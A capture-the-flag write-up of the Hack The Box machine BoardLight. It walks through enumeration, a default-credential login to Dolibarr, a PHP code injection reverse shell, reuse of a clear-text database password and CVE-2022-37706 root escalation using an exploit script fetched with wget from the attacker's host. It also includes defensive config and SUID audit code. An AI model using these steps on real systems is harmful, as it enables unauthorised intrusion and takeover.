---
title: "HTB BoardLight Writeup"
date: 2024-05-26 00:30:00
categories: HTB Machine
tags: Default_user_pass PHP Code Injection Binary_exploitation CVE
---
## Shell as www-data

### Enumeration
```
└─# nmap -sC -sV -p- -T4 --min-rate=9326 --vv board.htb
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-26 10:51 EDT
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 10:51
Completed NSE at 10:51, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 10:51
Completed NSE at 10:51, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 10:51
Completed NSE at 10:51, 0.00s elapsed
Initiating Ping Scan at 10:51
Scanning board.htb (10.10.11.11) [4 ports]
Completed Ping Scan at 10:51, 0.28s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 10:51
Scanning board.htb (10.10.11.11) [65535 ports]
Discovered open port 22/tcp on 10.10.11.11
Discovered open port 80/tcp on 10.10.11.11
```
Only ports 22 and 80 are open, so there is not much to work with here. Since board.htb itself serves only a landing page, I'll try subdomain enumeration; the vulnerability is probably on a subdomain of board.htb.
```
ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt -u "http://board.htb" -H "HOST: FUZZ.board.htb" -c -fs 15949

       v2.1.0-dev
________________________________________________
 :: Method           : GET
 :: URL              : http://board.htb
 :: Wordlist         : FUZZ: /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt
 :: Header           : Host: FUZZ.board.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response size: 15949
________________________________________________

crm                     [Status: 200, Size: 6360, Words: 397, Lines: 150, Duration: 268ms]
web3452                 [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 329ms]
web4000                 [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 334ms]
wishlist                [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 332ms]
```
Now add `crm.board.htb` to `/etc/hosts`.
### Identify Vulnerability

The Dolibarr version is 17.0, so let's research whether this version is vulnerable.

> In Dolibarr 17.0.0 with the CMS Website plugin (core) enabled, an authenticated attacker can obtain remote command execution via php code injection bypassing the application restrictions.

The CMS module is vulnerable to PHP code injection, but it requires authentication.
```
The default username and password for Dolibarr, a popular open-source ERP and CRM software, often depend on how it was installed and set up. However, the typical default credentials are:
Username: admin
Password: admin
```

As you can see, the default username and password are both admin.

After entering those credentials, I successfully logged in to the dashboard.
### PHP Code Injection

1. Click Website, then click + and create your site.
2. Choose Import website template and click Load (any template is fine).
3. Click Edit page, put in your PHP revshell code, and click Save.
```
└─# nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.10.14.110] from (UNKNOWN) [10.10.11.11] 46260
Linux boardlight 5.15.0-107-generic #117~20.04.1-Ubuntu SMP Tue Apr 30 10:35:57 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
 08:55:52 up 40 min,  4 users,  load average: 0.62, 0.46, 0.52
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bash: cannot set terminal process group (856): Inappropriate ioctl for device
bash: no job control in this shell
www-data@boardlight:/$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
## Shell as larissa

After searching Google for "Where is the Dolibarr default config located?" I found this page.

Log in as the larissa user using the MySQL credentials from the Dolibarr config.
```
www-data@boardlight:~/html/crm.board.htb/htdocs/conf$ cat conf.php
cat conf.php
<?php
//
// File generated by Dolibarr installer 17.0.0 on May 13, 2024
//
// Take a look at conf.php.example file for an example of conf.php file
// and explanations for all possibles parameters.
//
$dolibarr_main_url_root='http://crm.board.htb';
$dolibarr_main_document_root='/var/www/html/crm.board.htb/htdocs';
$dolibarr_main_url_root_alt='/custom';
$dolibarr_main_document_root_alt='/var/www/html/crm.board.htb/htdocs/custom';
$dolibarr_main_data_root='/var/www/html/crm.board.htb/documents';
$dolibarr_main_db_host='localhost';
$dolibarr_main_db_port='3306';
$dolibarr_main_db_name='dolibarr';
$dolibarr_main_db_prefix='llx_';
$dolibarr_main_db_user='dolibarrowner';
$dolibarr_main_db_pass='serverfun2$2023!!';
```

The config file lives at `conf/conf.php` under the Dolibarr `htdocs` directory.
```
www-data@boardlight:~/html/crm.board.htb/htdocs/conf$ su larissa
su larissa
Password: serverfun2$2023!!
id
uid=1000(larissa) gid=1000(larissa) groups=1000(larissa),4(adm)
```
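The lateral move above works because the web-server account can read a config file holding a clear-text database password that is also a user's login password. As an added example (my own code, not part of the original writeup or of Dolibarr), here is a small auditor that parses the `$name='value';` assignments in a `conf.php` and reports any `*_pass` setting in a file that other local users can read. The sample config and its values are constructed placeholders.

```python
import os
import re
import stat
import tempfile
from typing import Dict, List, Tuple

# Constructed sample modelled on the conf.php above; the values are placeholders.
SAMPLE_CONF = r"""<?php
$dolibarr_main_url_root='http://crm.board.htb';
$dolibarr_main_db_host='localhost';
$dolibarr_main_db_user='dolibarrowner';
$dolibarr_main_db_pass='it\'s-a-PLACEHOLDER';
"""

# $name='value'; where the single-quoted PHP value may contain \' or \\ escapes
ASSIGN_RE = re.compile(r"^\s*\$(\w+)\s*=\s*'((?:\\.|[^'\\])*)'\s*;", re.M)


def parse_conf(text: str) -> Dict[str, str]:
    """Return {setting: value} for the single-quoted assignments in a conf.php."""
    return {m.group(1): re.sub(r"\\([\\'])", r"\1", m.group(2))
            for m in ASSIGN_RE.finditer(text)}


def audit_conf(path: str) -> List[str]:
    """Report clear-text secrets (*_pass settings) in a conf.php whose mode lets
    'other' read it, which is exactly what let www-data see the DB password."""
    mode = os.stat(path).st_mode
    with open(path, encoding="utf-8") as fh:
        secrets = [k for k, v in parse_conf(fh.read()).items()
                   if k.endswith("_pass") and v]
    if secrets and mode & stat.S_IROTH:
        return [f"{path} is {stat.filemode(mode)} and exposes {', '.join(secrets)}"]
    return []


def demo() -> Tuple[List[str], List[str]]:
    """Write the sample with a loose mode, audit it, then tighten the mode and re-audit."""
    fd, path = tempfile.mkstemp(suffix="conf.php")
    with os.fdopen(fd, "w", encoding="utf-8") as fh:
        fh.write(SAMPLE_CONF)
    try:
        os.chmod(path, 0o644)
        loose = audit_conf(path)
        os.chmod(path, 0o640)  # owner rw, web-server group r, nothing for others
        tight = audit_conf(path)
    finally:
        os.unlink(path)
    return loose, tight
```

Tightening the mode only fixes the read path; the DB password being reused as a Linux password is a separate problem that no file permission solves.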
## Shell as root

```
find / -perm -04000 -ls 2>/dev/null
 2491  16 -rwsr-xr-x 1 root root        14488 Jul  8  2019 /usr/lib/eject/dmcrypt-get-device
  608  16 -rwsr-sr-x 1 root root        14488 Apr  8 18:36 /usr/lib/xorg/Xorg.wrap
17633  28 -rwsr-xr-x 1 root root        26944 Jan 29  2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys
17628  16 -rwsr-xr-x 1 root root        14648 Jan 29  2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_ckpasswd
17627  16 -rwsr-xr-x 1 root root        14648 Jan 29  2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_backlight
17388  16 -rwsr-xr-x 1 root root        14648 Jan 29  2020 /usr/lib/x86_64-linux-gnu/enlightenment/modules/cpufreq/linux-gnu-x86_64-0.23.1/freqset
 2368  52 -rwsr-xr-- 1 root messagebus  51344 Oct 25  2022 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
 5278 468 -rwsr-xr-x 1 root root       477672 Jan  2 09:13 /usr/lib/openssh/ssh-keysign
10039 388 -rwsr-xr-- 1 root dip        395144 Jul 23  2020 /usr/sbin/pppd
```
Do you see what I see? Yup, that's the Enlightenment binary. I had read about the vulnerability in this binary a few months ago, downloaded it on my own Ubuntu box, tried the privilege escalation, and it worked.
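The `find` listing above is what a defender should be diffing against a known baseline: an unexpected setuid-root helper such as `enlightenment_sys` is the thing to notice before someone else does. As an added example (my own code, not from the original writeup), here is a checker that parses `find -ls` output and flags SUID files that are not in the baseline, have a changed owner, or are writable by group or others. The baseline and the `/opt/constructed/helper` line are constructed for illustration; the other sample lines are from the listing above.

```python
from typing import Dict, List, NamedTuple

# Sample input: four lines from the `find / -perm -04000 -ls` output above
# plus one constructed line (/opt/constructed/helper) that is world-writable.
SAMPLE_FIND_LS = """\
 2491  16 -rwsr-xr-x 1 root root       14488 Jul  8  2019 /usr/lib/eject/dmcrypt-get-device
17633  28 -rwsr-xr-x 1 root root       26944 Jan 29  2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys
 2368  52 -rwsr-xr-- 1 root messagebus 51344 Oct 25  2022 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
 5278 468 -rwsr-xr-x 1 root root      477672 Jan  2 09:13 /usr/lib/openssh/ssh-keysign
99999  16 -rwsrwxrwx 1 root root       14648 Jan 29  2020 /opt/constructed/helper
"""

# Constructed baseline (assumption): SUID files expected on this kind of Ubuntu
# 20.04 host and the owner each should have. Build the real one from a clean image.
BASELINE: Dict[str, str] = {
    "/usr/lib/eject/dmcrypt-get-device": "root",
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper": "root",
    "/usr/lib/openssh/ssh-keysign": "root",
}


class SuidEntry(NamedTuple):
    mode: str   # e.g. -rwsr-xr-x
    owner: str
    group: str
    path: str


def parse_find_ls(text: str) -> List[SuidEntry]:
    """Parse `find -ls` lines: inode blocks mode links owner group size mon day time path."""
    entries = []
    for line in text.splitlines():
        parts = line.split(None, 10)  # maxsplit keeps spaces inside the path intact
        if len(parts) == 11 and len(parts[2]) == 10:
            entries.append(SuidEntry(parts[2], parts[4], parts[5], parts[10]))
    return entries


def audit_suid(entries: List[SuidEntry], baseline: Dict[str, str]) -> List[str]:
    """Flag SUID files missing from the baseline, with a changed owner, or writable
    by group/others (anyone who can write such a file can run code as its owner)."""
    findings = []
    for e in entries:
        if e.path not in baseline:
            findings.append(f"unexpected SUID binary: {e.path} (owner {e.owner})")
        elif e.owner != baseline[e.path]:
            findings.append(f"owner changed: {e.path} is {e.owner}, expected {baseline[e.path]}")
        if e.mode[5] == "w" or e.mode[8] == "w":  # group-write / other-write bits
            findings.append(f"group/world-writable SUID binary: {e.path} ({e.mode})")
    return findings


def demo() -> List[str]:
    return audit_suid(parse_find_ls(SAMPLE_FIND_LS), BASELINE)
```

On the real host, pipe `find / -perm -04000 -ls 2>/dev/null` into `parse_find_ls` and treat every "unexpected" hit as a package to look up for known CVEs or remove if it is not needed.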
### CVE-2022-37706-LPE-exploit

```
wget http://10.10.14.110:8000/eng.sh
--2024-05-26 08:47:03--  http://10.10.14.110:8000/eng.sh
Connecting to 10.10.14.110:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 707 [text/x-sh]
Saving to: ‘eng.sh’

     0K                                                       100% 41.3M=0s

2024-05-26 08:47:04 (41.3 MB/s) - ‘eng.sh’ saved [707/707]

bash eng.sh
CVE-2022-37706
[*] Trying to find the vulnerable SUID file...
[*] This may take few seconds...
[+] Vulnerable SUID binary found!
[+] Trying to pop a root shell!
[+] Enjoy the root shell :)
mount: /dev/../tmp/: can't find in /etc/fstab.
id
uid=0(root) gid=0(root) groups=0(root),4(adm),1000(larissa)
```